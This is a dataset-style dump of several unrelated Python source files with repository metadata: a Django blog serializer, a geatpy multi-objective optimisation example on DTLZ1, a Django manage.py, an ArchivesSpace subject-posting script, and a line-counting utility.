        self.total = self.total + int(value)

    def subtract(self, value):
        """Debit value (coerced to int) from the running total.

        Args:
            value (int): numeric value
        """
        self.total = self.total - int(value)
| [
"phriscage@gmail.com"
] | phriscage@gmail.com |
019082fa9d75ecfb96a0de970631cd8ecb05eaeb | 98ad5d08eda9dbce55947b53dc8e1627e7be5404 | /backend/blog_api/serializers.py | e57bb6df05843dd07c9c6292467f59f623977218 | [] | no_license | mhkmcp/blog-react-djagno | 651a9f1f65f0c54804ceb8ea51cddf0587ef2c81 | 6d0904a08311590b8d07a99c6c02d8f50bbaa0de | refs/heads/main | 2023-08-03T16:28:52.666182 | 2021-09-20T15:00:48 | 2021-09-20T15:00:48 | 408,421,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | from rest_framework import serializers
from blog.models import Post
class PostSerializer(serializers.ModelSerializer):
    """DRF serializer exposing the blog Post fields used by the API."""

    class Meta:
        # Serialize Post instances; only the listed fields are exposed.
        model = Post
        fields = ('id', 'title', 'excerpt', 'content', 'author', 'status')
"mhkmcp@yahoo.com"
] | mhkmcp@yahoo.com |
5ae88cd77491d8b24fad6d607239ecf25badf6b8 | 31764c3903bd7b7cde4649860eb843bc8545095d | /books/Language/python/geatpy/code/A02_DTLZ1.py | 8161e8d8fd83f130fdf31b1d442681d18bd7f173 | [] | no_license | madokast/madokast.github.io.old | bf3aa967ee7ccdba99ce7d667e02f8672ae8b00e | 3af6570401c9f7f11932cc3bac79f4979507c79b | refs/heads/master | 2023-06-20T07:52:50.119738 | 2021-07-22T01:35:12 | 2021-07-22T01:35:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,670 | py | # -*- coding: utf-8 -*-
""" QuickStart """
import numpy as np
import geatpy as ea
# Custom problem class implementing the DTLZ1 benchmark
class MyProblem(ea.Problem):  # inherits from geatpy's Problem base class
    def __init__(self, M):  # M: number of objectives (3 in this test)
        # problem name
        name = 'DTLZ1'  # arbitrary label for the problem
        # minimize/maximize flag per objective
        maxormins = [1] * M  # 1: minimize the objective; -1: maximize it
        # number of decision variables
        Dim = M + 4
        # decision variable types
        varTypes = np.array([0] * Dim)  # 0: continuous (real); 1: integer
        # decision variable bounds
        lb = [0] * Dim  # lower bounds
        ub = [1] * Dim  # upper bounds
        # whether each bound is inclusive (1) or exclusive (0)
        lbin = [1] * Dim  # lower-bound inclusiveness
        ubin = [1] * Dim  # upper-bound inclusiveness
        # call the parent constructor to finish instantiation
        ea.Problem.__init__(self, name, M, maxormins, Dim, varTypes, lb, ub, lbin, ubin)
    def aimFunc(self, pop):  # objective function: maps pop.Phen to pop.ObjV
        Vars = pop.Phen  # decision-variable matrix, one row per individual
        XM = Vars[:,(self.M-1):]  # the trailing "distance" variables
        # DTLZ1 g(XM) term
        g = 100 * (self.Dim - self.M + 1 + np.sum(((XM - 0.5)**2 - np.cos(20 * np.pi * (XM - 0.5))), 1, keepdims = True))
        ones_metrix = np.ones((Vars.shape[0], 1))
        # objective values f_1..f_M from cumulative products of the position variables
        f = 0.5 * np.fliplr(np.cumprod(np.hstack([ones_metrix, Vars[:,:self.M-1]]), 1)) * np.hstack([ones_metrix, 1 - Vars[:, range(self.M - 2, -1, -1)]]) * np.tile(1 + g, (1, self.M))
        pop.ObjV = f  # store the objective values on the population
    def calReferObjV(self):  # compute the true (global) Pareto front
        uniformPoint, ans = ea.crtup(self.M, 10000)  # 10000 reference points uniformly spread over the unit simplex
        globalBestObjV = uniformPoint / 2
        return globalBestObjV
# 编写执行代码
"""===============================实例化问题对象=============================="""
M = 3 # 设置目标维数
problem = MyProblem(M) # 生成问题对象
"""==================================种群设置================================="""
Encoding = 'RI' # 编码方式
NIND = 100 # 种群规模
Field = ea.crtfld(Encoding, problem.varTypes, problem.ranges, problem.borders) # 创建区域描述器
population = ea.Population(Encoding, Field, NIND) # 实例化种群对象(此时种群还没被初始化,仅仅是完成种群对象的实例化)
"""================================算法参数设置==============================="""
myAlgorithm = ea.moea_NSGA3_templet(problem, population) # 实例化一个算法模板对象
myAlgorithm.MAXGEN = 500 # 最大进化代数
myAlgorithm.logTras = 1 # 设置每多少代记录日志,若设置成0则表示不记录日志
myAlgorithm.verbose = True # 设置是否打印输出日志信息
myAlgorithm.drawing = 0 # 设置绘图方式(0:不绘图;1:绘制结果图;2:绘制过程动画)
"""==========================调用算法模板进行种群进化=========================
调用run执行算法模板,得到帕累托最优解集NDSet以及最后一代种群。NDSet是一个种群类Population的对象。
NDSet.ObjV为最优解个体的目标函数值;NDSet.Phen为对应的决策变量值。
详见Population.py中关于种群类的定义。
"""
[NDSet, population] = myAlgorithm.run() # 执行算法模板,得到非支配种群以及最后一代种群
# NDSet.save() # 把非支配种群的信息保存到文件中
"""==================================输出结果=============================="""
print('用时:%f 秒' % myAlgorithm.passTime)
print('评价次数:%d 次' % myAlgorithm.evalsNum)
print('非支配个体数:%d 个' % NDSet.sizes) if NDSet.sizes != 0 else print('没有找到可行解!')
# if myAlgorithm.log is not None and NDSet.sizes != 0:
# print('GD', myAlgorithm.log['gd'][-1])
# print('IGD', myAlgorithm.log['igd'][-1])
# print('HV', myAlgorithm.log['hv'][-1])
# print('Spacing', myAlgorithm.log['spacing'][-1])
# """=========================进化过程指标追踪分析========================="""
# metricName = [['igd'], ['hv']]
# Metrics = np.array([myAlgorithm.log[metricName[i][0]] for i in range(len(metricName))]).T
# 绘制指标追踪分析图
# ea.trcplot(Metrics, labels=metricName, titles=metricName) | [
"578562554@qq.com"
] | 578562554@qq.com |
ef77869c6d10660f4ae73774533726d7ec573601 | 3f9dcfb4f76747c97d756b87aec50dc38ede8cb0 | /manage.py | bf15b5930f88e4a520c3f346244e26ec06884ba1 | [] | no_license | gabrielcoder247/realone | c7887311902dcc0952a76667b863d9c99b0c8452 | 810661e90c2931dbd81a73f07944e7f5635f1ddc | refs/heads/master | 2022-12-03T19:20:46.313758 | 2020-04-06T11:46:09 | 2020-04-06T11:46:09 | 253,480,350 | 0 | 0 | null | 2022-11-22T05:27:59 | 2020-04-06T11:43:33 | Python | UTF-8 | Python | false | false | 629 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'rentorbuy.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"gabrielcoder247@gmail.com"
] | gabrielcoder247@gmail.com |
ff27dbd756b4dde221c7ca61cb5f0e3da88cfb58 | a60bc58d17720a2f1e2f8778146248c01adf8a5a | /post_subjects.py | 3221347af689853f3f40fd00b7bd68bace9316dc | [] | no_license | meau/bentley_scripts | 08bdbc159939731966bdeda396c93022212f922d | e17abff89a775b2b7273661e92b849b85e6a1f8d | refs/heads/master | 2021-01-17T05:46:24.838505 | 2015-09-21T16:17:25 | 2015-09-21T16:17:25 | 42,587,433 | 1 | 0 | null | 2015-09-16T13:03:26 | 2015-09-16T13:03:25 | Python | UTF-8 | Python | false | false | 1,925 | py | """
curl -H "X-ArchivesSpace-Session:$TOKEN" -d '{"source":"lcsh","vocabulary":"/vocabularies/1","terms":[{"term":"Cheese", "term_type":"topical","vocabulary":"/vocabularies/1"},{"term":"Michigan","term_type":"geographic","vocabulary":"/vocabularies/1"}]}' http://localhost:8089/subjects
"""
import requests
import json
import csv
baseURL = 'http://localhost:8089'
user='admin'
password='admin'
auth = requests.post(baseURL + '/users/'+user+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
subjects_csv = 'C:/Users/Public/Documents/aspace_subjects.csv'
"""
subject_ids = requests.get(baseURL+'/subjects?all_ids=true').json()
for i in subject_ids:
subject_json = requests.get(baseURL+'/subjects/'+str(i)).json()
print subject_json['title'], subject_json['uri']
"""
with open(subjects_csv,'rb') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
row_indexes = len(row) - 1
source = row[1]
terms_list = []
for row_num in range(3,row_indexes + 1, 2):
term = row[row_num]
term_type = row[row_num+1]
terms_dict = {}
terms_dict["term"] = term
terms_dict["term_type"] = term_type
terms_dict["vocabulary"] = "/vocabularies/1"
terms_list.append(terms_dict)
data = json.dumps({"source":source,"vocabulary":"/vocabularies/1","terms":[i for i in terms_list]})
subjects = requests.post(baseURL+'/subjects', headers=headers, data=data).json()
if 'status' in subjects:
if subjects['status'] == 'Created':
subject_uri = subjects['uri']
row.append(subject_uri)
with open('C:/Users/Public/Documents/posted_subjects.csv','ab') as csv_out:
writer = csv.writer(csv_out)
writer.writerow(row)
print subjects
| [
"djpillen@umich.edu"
] | djpillen@umich.edu |
bce301e020d3e0032f55ca6472c9e2c8cf63c121 | aa54fd5cafc65d18ceac52097237482cec27f674 | /planetary_system_stacker/Test_programs/count_lines_of_code.py | 5f56284c52c4e38aa219fd0850afce7de4024311 | [] | no_license | Rolf-Hempel/PlanetarySystemStacker | 84f6934e6748177fb1aca20b54392dee5c3f2e3c | 304952a8ac8e991e111e3fe2dba95a6ca4304b4e | refs/heads/master | 2023-07-20T04:11:06.663774 | 2023-07-17T15:20:15 | 2023-07-17T15:20:15 | 148,365,620 | 228 | 34 | null | 2023-09-01T16:33:05 | 2018-09-11T19:00:13 | Python | UTF-8 | Python | false | false | 1,442 | py | # -*- coding: utf-8; -*-
import os
def countlines(start, lines=0, header=True, begin_start=None):
if header:
print('{:>10} |{:>10} | {:<20}'.format('ADDED', 'TOTAL', 'FILE'))
print('{:->11}|{:->11}|{:->20}'.format('', '', ''))
for thing in os.listdir(start):
thing = os.path.join(start, thing)
# With the following line only non-GUI code is counted.
if os.path.isfile(thing) and not os.path.isfile(thing[:-3] + '.ui'):
# As an alternative count all files.
# if os.path.isfile(thing):
if thing.endswith('.py'):
with open(thing, 'r') as f:
newlines = f.readlines()
newlines = len(newlines)
lines += newlines
if begin_start is not None:
reldir_of_thing = '.' + thing.replace(begin_start, '')
else:
reldir_of_thing = '.' + thing.replace(start, '')
print('{:>10} |{:>10} | {:<20}'.format(
newlines, lines, reldir_of_thing))
for thing in os.listdir(start):
thing = os.path.join(start, thing)
if os.path.isdir(thing):
lines = countlines(thing, lines, header=False, begin_start=start)
return lines
directory = r'D:\SW-Development\Python\PlanetarySystemStacker\planetary_system_stacker'
lines = countlines(directory)
| [
"rolf6419@gmx.de"
] | rolf6419@gmx.de |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.